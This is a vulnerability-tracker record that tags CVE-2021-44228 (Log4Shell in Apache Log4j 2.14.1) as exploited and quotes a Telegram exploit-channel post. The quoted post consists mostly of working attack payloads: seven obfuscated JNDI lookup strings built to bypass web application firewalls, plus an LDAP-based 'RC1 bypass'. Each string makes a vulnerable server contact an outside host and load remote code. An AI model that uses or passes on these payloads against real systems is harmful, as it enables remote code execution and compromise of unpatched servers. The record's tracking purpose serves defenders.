{"uuid": "fdcd9bda-7b89-4072-8b26-661643de3232", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2021-44228", "type": "exploited", "source": "https://t.me/LearnExploit/3116", "content": "Apache Log4j 2.14.1 RCE (CVE-2021-44228)\n\nBypass WAF :\n\n1- ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}\n\n2- ${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}\n\n3- ${jndi:rmi://adsasd.asdasd.asdasd}\n\n4 - ${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n\n5- ${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n\n6- ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}\n\n7 - ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}\n\nBypass RC1 :\n\n${jndi:ldap://127.0.0.1:1389/ badClassName}\n\nGithub \n\n#Log4J #Java \n\u2014\u2014\u2014\u2014\u2014\u2014\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2021-12-13T09:37:57.000000Z"}